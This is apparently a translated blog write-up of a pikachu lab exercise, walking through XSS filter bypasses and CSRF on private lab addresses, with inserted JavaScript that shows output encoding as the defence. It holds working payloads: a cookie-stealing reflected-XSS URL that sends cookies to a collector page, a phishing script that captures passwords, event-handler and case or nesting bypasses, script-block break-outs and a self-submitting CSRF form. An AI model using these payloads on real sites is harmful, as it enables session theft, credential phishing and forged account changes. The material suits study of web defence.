Web security techniques -- XSS and CSRF

XSS is generally script code, mainly JS, though AS and VBS also occur.

It is divided into three categories: reflected, stored and DOM-based.

In general, when testing manually, first consider where there is input and where there is output.

 

Then test sensitive characters: generally <>"'()&? and similar characters, and then check whether the server has any defence or escaping in place.

Next insert several HTML tags, including unclosed ones. Check whether they are filtered or HTML-encoded, and whether unclosed tags are left open.

Then test JS code:

<script> alert(123) </script>

Likewise test prompt and confirm, or script src pointing at an internal address. Then test whether changing the case of script bypasses the filter.

Then look at the nesting ("doll") trick for bypassing the filter:

<Scr<script>ipt>alert(123)</scr</script>ipt>

Then there is the <a href filter. Check which of the data and the tags get filtered.

If the data is not filtered, fill in href="javascript:alert(123)">TEST</a> and see whether the JS runs.

If the JS keywords are filtered, try to bypass the sensitive words.

If that can be bypassed, test whether events are filtered.

If events are filtered, check whether it is a blacklist or a whitelist: test a few edge-case EVENT names such as onclimbatree that hardly anyone uses. If that is not filtered, it proves a blacklist, and you can pick other events. There are many places to test and bypass, but that is the nature of offence versus defence... the strategies are so numerous they can never be exhausted.

XSS can be used for many things. Cookie stealing is common, as are changing page content, planting drive-by malware, redirects and worms.

First, a reflected XSS attack to steal cookies.

Try constructing a cookie-grabbing function.

It succeeded; the generated cookie-stealing URL is 172.22.19.240/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F172.22.19.240%2Fpikachu%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

Reflected XSS (POST)

Tried it; there is no restriction on input.

Modified post.html on the server; then it is enough to get the target to visit my http://172.22.19.240/pikachu/pkxss/xcookie/post.html

Stored XSS

Insert something to see whether JS code can be inserted.

The pop-up succeeded.

Try phishing.

Insert the JS code.

After the password is entered, the information is passed to 172.22.38.205\pikachu\pkxss\xfish\xfish.php and sent to the backend database.

This target probably has to be reinstalled before it can be used a second time.

DOM-based XSS

First test whether there is any input restriction, and found:

Found it, at this position. Noticed a tag-closing issue. Just use "> to close the preceding tag, then insert a mouseover trigger after it: '><img src="33" onmouseover="alert(222)">

But while capturing packets I found that the GET sends no parameters.

Then DOM XSS X.

Found that this spot passes parameters, meaning the URL can be sent to someone else to click and execute the code: '> <imgsrc="231" onmouseover=alert("222")>

Found that this URL can be used to make the other side trigger it: http://172.22.38.205/pikachu/vul/xss/xss_dom_x.php?text=%27%3E+%3Cimgsrc%3D%22231%22+onmouseover%3Dalert%28%22222%22%29%3E

Blind XSS

First try to locate the output; it cannot be found by searching, so with no position to go on, try writing the closing tags directly.

Still not found... Went into the backend and found

Nothing there at all... inserting the JS code directly was enough.

XSS filtering

Again, first locate the output and test character filtering.

Start testing JS code:

<script>alert(1)</script>

All gone. Nesting did not work either; it probably filters <script, so check how many passes of filtering there are: <scri<scriptpt>alert(1)</scr</scriptipt>

The result was still the same; nesting failed. But it turned out to be a garbage filter: the case trick <ScRiPt>alert(1)</ScRiPt> bypassed it directly.

It does not look like much of a filter, so <a href and the like can probably get through too.
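The filter defeated in this section, like the event-name blacklist probed with onclimbatree earlier, is a blacklist, and the case trick and the nesting trick show the two ways such filters fail. The following is an added example written for this page, not code from the post or from the pikachu project: it reproduces both failure modes in JavaScript and shows the fix, HTML-entity encoding of the output, which leaves no character for any tag, any case variant or any event handler to live in. The names blacklistFilter, stripScriptTags, escapeHtml and isInert are this example's own.

```javascript
// Added example, not from the original post or the pikachu project.
// Two blacklist filters of the kind the post defeats, and the context-independent
// fix: HTML-entity encoding, which leaves no "<" for any tag or event to live in.

// Case-sensitive keyword removal: defeated by the post's <ScRiPt> variant.
function blacklistFilter(input) {
  return String(input).replace(/<script/g, "").replace(/<\/script/g, "");
}

// Single-pass whole-tag removal: defeated by the post's nesting trick, because removing
// the inner <script> re-joins the fragments around it into a fresh <script>.
function stripScriptTags(input) {
  return String(input).replace(/<\/?script>/gi, "");
}

// Encode for the HTML body / quoted-attribute context. Order matters: "&" first,
// otherwise the entities produced by the later replacements get double-encoded.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Cheap check for a test suite or log review: after encoding, no character that could
// open a tag, close an attribute or introduce an event handler may remain.
function isInert(output) {
  return !/[<>"']/.test(output);
}

// Payloads are the ones quoted in the post.
const CASE_PAYLOAD = '<ScRiPt>alert(1)</ScRiPt>';
const NESTED_PAYLOAD = '<scr<script>ipt>alert(1)</scr</script>ipt>';
const EVENT_PAYLOAD = '\'><img src="33" onmouseover="alert(222)">';

function demo() {
  return {
    caseBypass: blacklistFilter(CASE_PAYLOAD),       // unchanged: the filter never matched
    nestingBypass: stripScriptTags(NESTED_PAYLOAD),  // becomes <script>alert(1)</script>
    encoded: [CASE_PAYLOAD, NESTED_PAYLOAD, EVENT_PAYLOAD].map(escapeHtml),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The point for a defender is that both filters try to recognise the attack, while escapeHtml only has to recognise five characters; whether the filter is a blacklist or a whitelist becomes irrelevant once the output is encoded for the context it lands in.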

XSS and HTML special characters

Inject directly:

<ScRiPt>alert(1)</ScRiPt>

Took a look.

Inserted the JS; it worked straight away.

On inspection, though, it seems many of the input characters were converted. EVENT should still be able to trigger.

XSS: href output

Since the hint says href output, guess that it sits inside <a href

Found that " is filtered... &quot;'<>??&?/

So just insert JS directly: javascript:alert(123)

Still works.

XSS: JS output

Again blindly write AAAAAAAAAAAAAa<>'"?%&

Then located it.

Found that at this position it also seems unfiltered.

First try closing the string, then comment out what follows:

'</script><script>alert(123)</script> -- 

Works.
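The last two sections reach two output contexts that HTML-entity encoding alone does not cover: a value placed in an href attribute, where javascript: is a valid URL scheme and no angle bracket is needed, and a value placed inside a quoted string in a <script> block, where the HTML parser ends the script at the first </script regardless of JS quoting, which is exactly what the '</script><script>alert(123)</script> -- payload relies on. The following added example, not code from the post or the pikachu project, shows a scheme allowlist for the href context and a JS-string-literal encoder for the script context; the same href rule applies to the DOM XSS section above, where the injected text landed in an href. safeHref, jsStringLiteral, renderScriptAssignment and ALLOWED_SCHEMES are names chosen for this example.

```javascript
// Added example, not from the original post or the pikachu project.
// Encoders for the two contexts the post's href-output and js-output sections exercise.

const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
const PLACEHOLDER_BASE = "https://placeholder.invalid/"; // only used to resolve relative paths

// href context: the dangerous part is the scheme, not any single character, so validate
// the parsed scheme instead of filtering characters. The WHATWG URL parser lowercases the
// scheme and strips tabs/newlines and surrounding controls, so "JaVaScRiPt:" and
// "java\tscript:" are both recognised as javascript: and rejected.
function safeHref(candidate) {
  let parsed;
  try {
    parsed = new URL(String(candidate), PLACEHOLDER_BASE);
  } catch {
    return "#";                                // unparseable: replace with a harmless anchor
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return "#";
  // Relative paths resolved against the placeholder are handed back as given (trimmed);
  // absolute URLs come back normalised. Either way the value still needs attribute
  // encoding (quotes) when it is written into the tag.
  const isRelative = parsed.origin === new URL(PLACEHOLDER_BASE).origin;
  return isRelative ? String(candidate).trim() : parsed.href;
}

// JS-string context: JSON.stringify handles quotes and backslashes, and the extra escapes
// keep "</script" and "<!--" from ever appearing in the emitted literal, which is what
// stops the string-break-out payload. U+2028/2029 are line terminators in JS but not in
// JSON, so they are escaped as well.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// The inline-script line a server-side template would emit for a user-controlled value.
// `name` is the developer's variable name, never user input.
function renderScriptAssignment(name, value) {
  return `<script>var ${name} = ${jsStringLiteral(value)};</script>`;
}

const HREF_PAYLOAD = "javascript:alert(123)";                  // from the post
const JS_PAYLOAD = "'</script><script>alert(123)</script> -- "; // from the post
```

Note that the page's observation in the href section (quotes became &quot; yet javascript: still ran) is the expected outcome of applying only the HTML encoder to a URL attribute: the encoder did its job, but the context needed the scheme check on top of it.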

----------------------------------------

CSRF

CSRF (GET)

First capture the packet to see what URL the GET actually sends.

GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=yuanziyin&phonenum=110&add=earth&email=yingyingying&submit=submit is the URL passed. Found that the parameters seem to contain nothing account-related.

So just build the URL 172.22.38.205//pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=yuanziyin&phonenum=110&add=earth&email=yingyingying&submit=submit and a single click does it.

 

CSRF (POST)

Same here: build a file 123.html to do the POST and that is it...

Built an HTML file for the POST; just visit http://172.22.38.205/pikachu/123.html

123.html

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://172.22.38.205/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="yuanziyin" />
    <input id="phonenum" type="text" name="phonenum" value="110" />
    <input id="add" type="text" name="add" value="nvzhuang" />
    <input id="email" type="text" name="email" value="zainance" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

And then...

CSRF: token defence

The issue with token defence is whether the token is hard enough.

First tested it: it uses GET.

This one is fairly hard, though... because of the CSRF token refresh mechanism. It is troublesome and there are many defensive strategies; with a refresh every minute or one token per page it basically cannot be attacked.

In practice, though, some tokens never change, or stay the same from login to logout, and those can be messed with. Combinations are possible too: XSS+CSRF has some chance of succeeding. It is still not a great strategy, but it works against weaker targets.


Origin www.cnblogs.com/p201721430032/p/11991357.html